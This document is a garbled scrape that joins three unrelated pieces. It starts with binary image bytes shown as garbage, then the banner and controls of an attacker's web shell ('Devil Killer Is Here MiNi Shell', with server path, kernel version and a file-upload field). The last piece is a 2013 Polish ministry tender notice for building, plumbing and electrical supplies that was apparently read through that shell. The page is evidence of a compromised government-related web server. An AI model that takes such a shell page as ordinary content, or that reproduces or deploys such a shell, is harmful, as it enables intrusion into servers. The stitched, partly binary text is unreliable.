JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130109/13468-N-2013.html

<p class="kh_header"><b>Warszawa: Zakup i dostawa artykułów budowlanych, hydraulicznych i elektrycznych na potrzeby Ministerstwa Nauki i Szkolnictwa Wyższego</b><br>
<b>Numer ogłoszenia: 13468 - 2013; data zamieszczenia: 09.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnisw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów budowlanych, hydraulicznych i elektrycznych na potrzeby Ministerstwa Nauki i Szkolnictwa Wyższego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I.	ARTYKUŁY BUDOWLANE.
Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 1 do SIWZ.
Część II.	ARTYKUŁY HYDRAULICZNE.
Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 2 do SIWZ.
Część III.	ARTYKUŁY ELEKTRYCZNE
Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 3 do SIWZ.

Opis przedmiotu zamówienia dla poszczególnych części znajduje się w INFORMACJACH DOTYCZĄCYCH OFERT CZĘŚCIOWYCH.

1)	Zamawiający dopuszcza składanie ofert na dowolnie wybrane części przedmiotu zamówienia (Część I / Część II / Część III).
2)	Wykonawca składający ofertę na wybraną część przedmiotu zamówienia musi złożyć ofertę na wszystkie wymienione przez Zamawiającego pozycje w danej części.
3)	Zamawiający będzie oceniał oferty dla każdej części przedmiotu zamówienia osobno.
4)	Zamawiający zastrzega sobie prawo do dokonania wyboru oferty na każdą część przedmiotu zamówienia osobno - najkorzystniejsza oferta spośród złożonych 
na daną część zamówienia - oceniona na podstawie kryterium oceny ofert.
5)	W przypadku okoliczności unieważnienia postępowania Zamawiający unieważni postępowanie tylko w danej części.

Termin wykonania zamówienia: 
1)	Część I i II przedmiotu zamówienia - 14 dni kalendarzowych od daty zawarcia umowy;
2)	Część III przedmiotu zamówienia - 12 miesięcy od daty zawarcia umowy lub wcześniejszego wyczerpania kwoty, na którą zostanie zawarta umowa.

44411000-4	Wyroby sanitarne 
44411300-7	Umywalki
42131000-6	Krany, kurki i zawory
31682000-0	Wyroby elektryczne
31680000-6	Elektryczne artykuły i akcesoria
31532920-9	Żarówki i świetlówki
31211310-4	Wyłączniki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.11.10.00-1, 44.19.00.00-8, 44.52.00.00-1, 44.41.10.00-4, 44.41.13.00-7, 42.13.10.00-6, 31.68.20.00-0, 31.68.00.00-6, 31.53.29.20-9, 31.21.13.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełnienia powyższych warunków nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu (SIWZ Rozdział VI ust. 1). W przypadku Wykonawców występujących wspólnie warunki, o których mowa powyżej musi spełniać przynajmniej jeden z Wykonawców</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełnienia powyższych warunków nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu (SIWZ Rozdział VI ust. 1). W przypadku Wykonawców występujących wspólnie warunki, o których mowa powyżej musi spełniać przynajmniej jeden z Wykonawców</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełnienia powyższych warunków nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu (SIWZ Rozdział VI ust. 1). W przypadku Wykonawców występujących wspólnie warunki, o których mowa powyżej musi spełniać przynajmniej jeden z Wykonawców</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełnienia powyższych warunków nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu (SIWZ Rozdział VI ust. 1). W przypadku Wykonawców występujących wspólnie warunki, o których mowa powyżej musi spełniać przynajmniej jeden z Wykonawców</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełnienia powyższych warunków nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu (SIWZ Rozdział VI ust. 1). W przypadku Wykonawców występujących wspólnie warunki, o których mowa powyżej musi spełniać przynajmniej jeden z Wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków - zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Ustanowienie Pełnomocnika musi jednoznacznie wynikać z umowy lub z innej czynności prawnej i mieć formę pisemną. Pełnomocnictwo dla Pełnomocnika należy dołączyć do oferty umocowanie Pełnomocnika wymaga podpisu prawnie upoważnionych przedstawicieli każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego) - wszelka korespondencja dotycząca niniejszego postępowania prowadzona będzie z Pełnomocnikiem.
Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o zamówienie.
Oferta składana przez spółki cywilne jest traktowana jak oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część I.	ARTYKUŁY BUDOWLANE
Część II.	 ARTYKUŁY HYDRAULICZNE
1.	Zamawiający dopuszcza dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w zakresie:
1)	zmiany terminu, o którym mowa w § 4 umowy w uzasadnionych przypadkach, wynikających z przyczyn obiektywnych i niezawinionych przez Strony. Strony zobowiązują się do niezwłocznego wzajemnego informowania, w formie elektronicznej na adresy podane w ust.7, o wystąpieniu przypadku, o którym mowa w zdaniu poprzednim. W przypadku stwierdzenia przez Zamawiającego okoliczności wskazanych w zdaniu pierwszym za uzasadnione, Strony dokonają stosownych zmian w umowie w formie pisemnej (aneks);    
2)	zmiany w zakresie asortymentu Artykułów w stosunku do przedstawionego w ofercie, gdy konieczność dokonania tej zmiany wynika z przyczyn losowych, niezależnych i niezawinionych przez Wykonawcę, w tym zaprzestania produkcji danego Artykułu czy też wycofania go z obrotu. W takim przypadku Wykonawca niezwłocznie powiadomi Zamawiającego - w formie elektronicznej na adres podany w ust.7 pkt 2 - o wystąpieniu tych okoliczności, wskazując nowy Artykuł. Zaproponowany przez Wykonawcę nowy Artykuł musi posiadać parametry techniczne co najmniej takie same jak Artykuł uprzednio oferowany a cena jednostkowa nowego Artykułu nie może być wyższa niż Artykułu, który ma zostać zastąpiony. W przypadku stwierdzenia przez Zamawiającego okoliczności wskazanych w zdaniu pierwszym za uzasadnione, Strony dokonają stosownych zmian w umowie w formie pisemnej (aneks).    
Część III.	ARTYKUŁY ELEKTRYCZNE

Zamawiający zastrzega sobie prawo ograniczenia ilości każdego z zamawianych Artykułów w granicach 30%, po wcześniejszym powiadomieniu Wykonawcy (bez jakichkolwiek konsekwencji finansowych Zamawiającego i odszkodowań na rzecz Wykonawcy).
Zamawiający zastrzega sobie prawo zamiany - w ramach asortymentu wymienionego w ofercie - ilości poszczególnych Artykułów (zwiększenie ilości danego Artykułu z jednoczesnym zmniejszeniem ilości Artykułu, którego zapotrzebowanie zmalało), bez jakichkolwiek konsekwencji finansowych Zamawiającego i odszkodowań na rzecz Wykonawcy. W takim przypadku Wykonawca zobowiązuje się do utrzymania cen jednostkowych Artykułów podanych w ofercie. Zmiany, o których mowa powyżej nie spowodują przekroczenia wartości umowy, o której mowa w § 5 ust 1. 

1.	Zamawiający dopuszcza dokonanie istotnych zmian postanowień umowy w stosunku do treści oferty w zakresie:
1)	zmiany terminu, o którym mowa w § 4 umowy lub terminu realizacji poszczególnych zamówień cząstkowych w uzasadnionych przypadkach, wynikających z przyczyn obiektywnych i niezawinionych przez Strony. Strony zobowiązują się do niezwłocznego wzajemnego informowania, w formie elektronicznej na adresy podane w ust.7, o wystąpieniu przypadku, o którym mowa w zdaniu poprzednim. W przypadku stwierdzenia przez Zamawiającego okoliczności wskazanych w zdaniu pierwszym za uzasadnione, Strony dokonają stosownych zmian w umowie w formie pisemnej (aneks);    
2)	zmiany w zakresie asortymentu Artykułów w stosunku do przedstawionego w ofercie, gdy konieczność dokonania tej zmiany wynika z przyczyn losowych, niezależnych i niezawinionych przez Wykonawcę, w tym zaprzestania produkcji danego Artykułu czy też wycofania go z obrotu. W takim przypadku Wykonawca niezwłocznie powiadomi Zamawiającego - w formie elektronicznej na adres podany w ust.7 pkt 2 - o wystąpieniu tych okoliczności, wskazując nowy Artykuł. Zaproponowany przez Wykonawcę nowy Artykuł musi posiadać parametry techniczne co najmniej takie same jak Artykuł uprzednio oferowany a cena jednostkowa nowego Artykułu nie może być wyższa niż Artykułu, który ma zostać zastąpiony. W przypadku stwierdzenia przez Zamawiającego okoliczności wskazanych w zdaniu pierwszym za uzasadnione, Strony dokonają stosownych zmian w umowie w formie pisemnej (aneks);    
3)	zmiany ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie stawki podatku, zgodnie z przepisami obowiązującymi w tym zakresie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.nauka.gov.pl/ (zakładka: zamówienia publiczne powyżej 14.000 euro)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3
00-529 Warszawa

Wydział Zamówień Publicznych, pok. 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2013 godzina 14:00, miejsce: Biuro Podawcze
Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3
00-529 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY BUDOWLANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Klamka do drzwi z szyldem dolnym okrągłym pod wkładkę, kolor patyna - 15 szt.
2.	Klamka do drzwi z szyldem dolnym okrągłym pod wkładkę, kolor nikiel  - 15 szt.
3.	Wkładka bębenkowa profilowa dwustronna, kolor niekiel - razem 50 szt.
4.	Klamka do drzwi z szyldem długim (do zamka bębenkowego) kolor nikiel - 10 szt. 
5.	Klamka do drzwi z szyldem długim (do zamka bębenkowego), kolor patyna - 10 szt.
6.	Zamek meblowy typu ZMB-1, kolor nikiel - 10 szt. 
7.	Zamek meblowy, kolor nikiel - 30 szt.
8.	Zamek meblowy centralny bez prowadnika, kolor nikiel - 30 szt.
9.	Ostrza zamienne do noży i skrobaków - razem 35 op. 
10.	Klej do drewna uniwersalny - 5 szt. 
11.	Papier ścierny na płótnie w arkuszach - razem 60 szt. 
12.	Taśma malarska - 20 szt. 
13.	Folia malarska - 20 szt. 
14.	Rozpuszczalnik nitro - 2 l.
15.	Pędzle malarskie do farby emulsyjnej z włosia sztucznego - razem 27 szt. 
16.	Korytka malarskie plastikowe - 3 szt.
17.	Korytka malarskie plastikowe - 5 szt.
18.	Wałki do malowania - 5 szt.
19.	Wałki do malowania - 5 szt.
20.	Wałki małe - razem 40 szt.
21.	Rączki do wałków malarskich - razem 10 szt. 
22.	Mieszadło do zaprawy zakładane do wiertarki - 2 szt. 
23.	Kołki rozporowe plastikowe do cegły dziurawki - razem 1 900 szt. 
24.	Gwoździe stalowe - razem 2 kg. 
25.	Klej uniwersalny montażowy do zastosowań wewnętrznych - 3 szt. 
26.	Kątowniki stalowe montażowe do mebli - razem 1 500 szt. 
27.	Wkręty do drewna z ostrym gwintem - razem 4 600 szt.
28.	Konfirmaty - razem 1 600 szt. 
29.	Taśma brzegowa do mebli papierowa z klejem - 300 mb. 
30.	Rozetki, kątowniki - 300 szt. 
31.	Tarcze diamentowe do glazury, terakoty, gresu - 2 szt. 
32.	Ściski stolarskie metalowe - 4 szt.
33.	Pilniki do drewna - 1 kpl.
34.	Pilniki do metalu - 1 kpl.
35.	Brzeszczoty do metalu - 20 szt.
36.	Skrzynka narzędziowa plastikowa na kółkach z rączką do ciągnięcia - 2 szt.
37.	Tarcze do szlifierki stołowej do metalu - 3 szt. 
38.	Tarcze do kamienia - razem 20 szt. 
39.	Tarcze do metalu - razem 20 szt. 
40.	Szczypce uniwersalne - 1 szt. 
41.	Szczypce płaskie - 1 szt. 
42.	Szczypce półokrągłe - 1 szt. 
43.	Szczypce nastawne - 1 szt. 
44.	Płyn czyszczący - rozpuszczalnik do kleju wodoodporny - 4 szt. 
45.	Papier ścierny do szlifierki taśmowej - razem 7 op.
Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.10.00-1, 44.19.00.00-8, 44.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ARTYKUŁY HYDRAULICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Korki automatyczne do umywalek - 15 szt.
2.	Baterie do umywalek - 20 szt.
3.	Klucze nasadowe z grzechotką - 1 kpl.
4.	Klucze oczkowo-płaskie - 1 kpl.
5.	Perlatory do baterii umywalkowych - 50 szt.
6.	Młotek - 1 szt.
7.	Kombinerki - kleszcze uniwersalne - 1 szt.
8.	Klucze nastawne - razem 3 szt.
9.	Klucze do rur - razem 3 szt.
10.	Zawory grzejnikowe - 150 szt.
11.	Zawory grzejnikowe - 80 szt.
12.	Klucze ampulowe - 1 kpl.
13.	Pasta uszczelniająca - 2 szt.
14.	Szczotka do WC - 15 szt.
Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.10.00-4, 44.41.13.00-7, 42.13.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ARTYKUŁY ELEKTRYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Świetlówka kompaktowa 18W - 50 szt. 
2.	Świetlówka kompaktowa 12W - 100 szt.
3.	Świetlówka kompaktowa 12W - 150 szt.
4.	Świetlówka 18W - 40 szt. 
5.	Świetlówka 18 W - 30 szt.
6.	Świetlówka liniowa 18 W - 200 szt.
7.	Świetlówka liniowa 36 W - 100 szt.
8.	Świetlówka liniowa 58 W - 200 szt.
9.	Świetlówka 13W - 30 szt.
10.	Świetlówka kołowa 22 W - 10 szt.
11.	Świetlówka kołowa 32W - 30 szt. 
12.	Świetlówka 21W - 30 szt.
13.	Żarówka halogenowa 50V - 50 szt.
14.	Żarówka LED - 200 szt. 
15.	Żarówka halogenowa 50 W - 30 szt. 
16.	Żarówka halogenowa 20 W - 300 szt. 
17.	Żarówka halogenowa 40 W - 200 szt.
18.	Żarówka 40W - 60 szt. 
19.	Żarówka 60W - 120 szt. 
20.	Zapłonniki do świetlówek S-2 - 250 szt. 
21.	Zapłonniki do świetlówek S-10 - 250 szt. 
22.	Wyłącznik instalacyjny S-301, B-10A - 36 szt. 
23.	Wyłącznik instalacyjny S-301, B-16A - 60 szt. 
24.	Wyłącznik instalacyjny S-301, B-20A - 48 szt.
25.	Wyłącznik instalacyjny S-301, B-25A - 36 szt.
26.	Wyłącznik instalacyjny S-301, C-10A - 48 szt. 
27.	Wyłącznik instalacyjny S-301, C-16A - 60 szt. 
28.	Wyłącznik instalacyjny S-301, C-20A - 60 szt. 
29.	Wyłącznik instalacyjny S-301, C-25A - 48 szt. 
30.	Wyłącznik instalacyjny S-303, C-16A - 12 szt.
31.	Wyłącznik instalacyjny S-303, C-20A - 12 szt. 
32.	Wyłącznik instalacyjny S-303, C-25A - 12 szt. 
33.	Wyłącznik różnicowo-prądowy P-302, 25A, 0,03A - 30 szt. 
34.	Wyłącznik różnicowo-prądowy P-304, 25A, 0,03A - 30 szt.
35.	Moduł oświetlenia awaryjnego - 40 szt. 
36.	Gniazdo p/t pojedyncze z bolcem - 40 szt. 
37.	Gniazdo p/t podwójne - 30 szt. 
